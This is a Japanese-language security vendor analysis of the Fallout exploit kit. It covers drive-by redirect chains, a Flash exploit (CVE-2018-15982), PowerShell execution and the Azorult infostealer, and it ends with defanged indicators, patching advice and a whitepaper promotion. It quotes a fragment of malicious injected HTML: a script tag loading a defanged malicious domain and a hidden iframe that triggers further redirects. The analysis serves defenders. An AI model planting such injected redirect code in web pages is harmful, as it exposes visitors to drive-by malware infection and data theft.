不注意なブラウジングは、あなたの1日を台無しにする可能性があり、しかもそれに気付いてないかもしれません。この記事では、不注意なブラウジングが、深刻な影響を伴うエクスプロイトキット(Exploit Kit) によるマルウェア感染を引き起こすかを明らかにします。
※エクスプロイト:PCやスマートフォンのOS・ソフトウェアなどの脆弱性を悪用して攻撃を行うプログラムです。

チームnao_secにより初めて発見された“Fallout”と呼ばれるエクスプロイトキット(EK)が、依然としてユーザーへの感染を続けています。

“Fallout”は、GitHub上にホスティングされている各種のエクスプロイト(特に最近のFlash Player関連のエクスプロイト(CVE-2018-15982)など)を利用して自分自身を兵器化しています。

エクスプロイトキットとは、悪意あるWebページや乗っ取られたWebページに埋め込まれているコンポーネントであり、クライアントサイド・アプリケーションの持つ脆弱性を悪用することで、当該Webページを訪問したユーザーのホスト上にマルウェアをインストールします。

一般にエクスプロイトキットの活動は日本で非常に顕著です。これは、日本では、現在でも時代遅れでパッチが適用されていないシステムが比較的多く利用されているためです。

2019年初頭より、エクスプロイトキット“Fallout”はGandCrabランサムウェアを配信するために利用されてきました。

また、最近の観測によれば、同エクスプロイトキットは被害者のホスト上に情報窃取型マルウェア(Infostealer)であるAzorultを投下していることが確認されました。

“Fallout”の感染メカニズムは、エクスプロイトキットが使用している従来型の手法とはかなり異なっています。たとえば、“Fallout”の感染メカニズムではPowerShellを使用することで、そのペイロードを実行しています。

サイバーリーズンのアナリストは、この記事で紹介する事例と同様の感染に日常的に遭遇しています。

この記事では主として、ペイロードそれ自体よりも、感染チェーンおよび感染ベクターに焦点を当てます。また、この記事ではボトムアップ型のアプローチを採用しており、まず感染チェーンと最終ペイロードについて説明した後で、感染ベクターについて説明します。

分析

サイバーリーズンにより観測された実行ツリーは極めて興味深いものであり、PowerShellがiexplore.exeの子プロセスとして実行されています。この異常な振る舞いは、間違いなく調査に値します。

サイバーリーズンは、PowerShellの悪意あるインスタンスの検知に成功しました。

このPowerShellは難読化されたコマンドを実行するものであり、そのコマンドはBase64でエンコードされており、最終ペイロードの実行を担当します。

デコードされたコマンドの一部を下記に示します。

iexplore.exe の代わりにPowerShellを使用して最終ペイロードを実行することで、エクスプロイトキット“Fallout”は、Windows 10におけるAntimalware Scan Interface(AMSI)保護メカニズムをすり抜けた後、最終的に情報剽窃マルウェアであるAzorult を投下します。

Azorultは、侵入したホストから、ビットコインウォレット、機密ファイル、保存されたログインデータ、Cookieなどの幅広い種類の貴重な情報を収集します。また、Azorultは、ダウンローダー機能を備えており、別のマルウェアを投下することが知られています。Azorultを配信するために、エクスプロイトキットとMalspam攻撃の両方が脅威アクターにより利用されました。

最初の感染が完了すると、続いてAzorultは、そのC2(Command & Control)サーバーとの通信を行います。

最初に戻りましょう。このような感染フローは「ドライブバイダウンロード」と呼ばれます。

乗っ取られたWebページや悪意あるWebページをブラウジングすることで、悪意あるコードがあなたのシステムにダウンロードされる場合があります。

単にWebページに「立ち寄る」だけで、ユーザーによるさらなるアクションもなく、ユーザーによる同意もなしに、悪意あるコードがあなたのマシンにバックグラウンドでダウンロードされた後、実行される可能性があります。

エクスプロイトキットは、しばしば(通常、XSS脆弱性を利用することで)正規のWebサイトに侵入した後、悪意あるコードを使って同サイトを感染させます。

この結果、一連のWebページへのリダイレクトが作成され、最終的に、脆弱性の悪用を意図した悪意あるページである「エクスプロイトキットのランディングページ」へとユーザーを誘導することになります。

これらの乗っ取られたWebサイトの大多数はアダルトサイトです。これらのWebサイトは人気が高く、多くのアクセス数を稼いでいるため、脅威アクターは特に同サイトを感染させることで多くの利益を得ることができます。

  1. 感染フローを表したチャートを下記に示します。
  2. ユーザーがインターネットをブラウジングする
  3. ユーザーが悪意あるWebページまたは乗っ取られたWebページに到達する
  4. 一連の悪意あるリダイレクト(およびブラウザチェック)が実施され、潜在的な脆弱性を持つ標的が特定される
  5. 最終リダイレクトの後、ユーザーは最後にエクスプロイトキット“Fallout”のランディングページへと誘導され、エクスプロイトキットはそれが利用する関連エクスプロイトを選択する
  6. エクスプロイトコードがGitHubからフェッチされる
  7. エクスプロイトキット“Fallout”はFlash Playerのエクスプロイト(CVE-2018-15982)を利用する
  8. PowerShellの実行に続いて、Azorultへの感染が行われる

ここで、PowerShellの親プロセスであるiexplore.exe.に注目してみましょう。 このようなInternet Explorerのインスタンスが存在することは、ユーザーがブラウジングを行っていることを示唆しています。Cybereasonプラットフォームを使うと、アクセス先のURLを簡単に特定できます。

次の画面ショットは、先述した一連のリダイレクトを表しています。

疑わしいドメインを調べる際には、当該ドメインの作成日時に関するレコードが役に立つ場合があります。

上記の悪意あるドメインは、最近になって登録されたものでした。最近登録されたばかりのドメインは、必ず疑ってみる必要があります。たとえば、“tracpadsforgame[.]info” というドメインはオランダでホストされており、同ドメインのWhoisレコードは次の通りです。

Domain Name: TRACPADSFORGAME[.]INFO
Registry Domain ID: D503300000129283219-LRMS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: www.namecheap.com
Updated Date: 2019-02-04
Creation Date: 2018-08-08
Registry Expiry Date: 2019-08-08

このドメインは、ドライブバイダウンロードとC2アクティビティの両方で観測されていました。たとえば、同ドメインは、RIG EKとAzorultの組み合わせで利用されていました。

ここで、“tracpadsforgame[.]info”(これは感染時のURLであり、脅威アクターにより頻繁にローテートされます)でホストされている悪意あるリダイレクションコードの一部を見てみましょう。これは、一連のリダイレクションにおけるページの1つです。

<script>
 (function(h,o,t,j,a,r){
  h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};
  h._hjSettings={hjid:623500,hjsv:5};
  a=o.getElementsByTagName(‘head’)[0];
  r=o.createElement(‘script’);r.async=1;
  r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;
  a.appendChild(r);
 })(window,document,’//static.hotjar.com/c/hotjar-‘,’.js?sv=’);
</script>
</head>
<body class="">
 <script type=’text/javascript’ src=’hxxp://cantouchthis[.]xyz’ [SANITIZED]></script><iframe onload="window.setTimeout(‘visits()’, 99)" src=’about:blank’ style=’position:absolute; top:22px; left:-2144px;’></iframe>
 <section class="m-above-header">
 <div class="container">
 <div class="row">
 <div class="m-above-header__inner">
 <div class="col-lg-6 col-md-7 m-above-header__inner__left">
 <ul>
  <li><span>Check </span><a href="https://www[.]ccgmining[.]com/profit-calculator.php" class="profit-calc right-arrow">profit calculator <span class="text-arrow-up">»</span></a></li>
  <li><a href="tel:"></a></li>
  <li><a href="https://www[.]ccgmining[.]com/cdn-cgi/l/email-protection#2e4d41405a4f4d5a6e4d4d49434740474049004d4143"><span class="__cf_email__" data-cfemail="35565a5b4154564175565652585c5b5c5b521b565a58">[email&#160;protected]</span></a></li>
 <li><a href="https://www[.]ccgmining[.]com/supporttickets.php" class="support right-arrow">support <span class="text-arrow-up">»</span></a></li>
 </ul>

ノイズを取り除くことで、我々は悪意あるiframeタグを特定できました(青色で強調)。このiframeは、悪意あるドメインであるcantouchthis[.]xyzをロードします。

cantouchthis[.]xyzがロードされた後、 我々は、調査すべきより多くの難読化されたJavaScriptを入手しました。追加のクリーンアップと関連するJavaScript部分の抽出した結果、我々は次のようなコード断片が存在していることに気付きました。

一番下の行を見ると、eval関数が利用されていることを簡単に特定できます。

このeval関数は、JavaScriptコードを引数として受け取り、同コードをコンパイルして実行します。eval関数はおそらく、JavaScriptの中で最も強力でかつ最も悪用されている関数です。

上記のコード断片において、 eval 関数に渡される難読化コードは次のようになります(難読化解除後のコードを示しています)。

我々が入手したものは、またもや若干難読化されたコードであり、このコードは一連のブラウザチェックを実行することにより、潜在的な被害者(適切なブラウザ)を特定するか、またはブラウザチェックをパスした場合には、同コードはvisits()関数により、ユーザーをさらにリダイレクトすることになる悪意あるiframeを動的に生成します。

Base64文字列は、hxxp://ad3[.]dogfunnyvideos[.]xyz/mydoggystylewithyourkittyへとデコードされます。これは、ユーザーがリダイレクトされる場所になります。最終的な悪意あるページに到達するまで、同様の処理が繰り返し実行されます。

エクスプロイトキットによる被害者の評価が成功した場合、ユーザーは最終ページへとリダイレクトされます。同ページに埋め込まれたエクスプロイトキットは、それが利用する関連エクスプロイト(この場合、Flash Player関連のエクスプロイト(CVE-2018-15982))を選択した後、対応するGitHubのページから当該エクスプロイトをダウンロードします。

推奨事項

すべてのサードパーティー製ソフトウェアが利用可能な最新バージョンであることをご確認ください。標的とされるソフトウェアが必要ない場合、そのようなソフトウェアを組織から削除することをご検討ください。

また、不適切なブラウジング習慣を避けるようユーザーを教育する必要があります。

セキュリティ侵害の痕跡

Payload (Azorult)

4f2e67981341e6458301328be6d26f0b8e3bffe3

Domains

i4you[.]id
ad3[.]dogfunnyvideos[.]xyz
cantouchthis[.]xyz
tracpadsforgame[.]info

IPs

108[.]61[.]57[.]77
5[.]23[.]49[.]200
185[.]56[.]233[.]186
91[.]235[.]129[.]167

ホワイトペーパー「すべての組織が狙われている」

企業、組織がどんなにセキュリティを強固にしてもハッカーが悪用できる脆弱性は必ず存在します。侵入されることが避けられないことを受け入れ、新たな対策を立てる必要があります。本書で、なぜ避けられないのか、どのように対処するのかをご覧ください。
https://www.cybereason.co.jp/product-documents/input/?post_id=606

ホワイトペーパー「すべての組織が狙われている」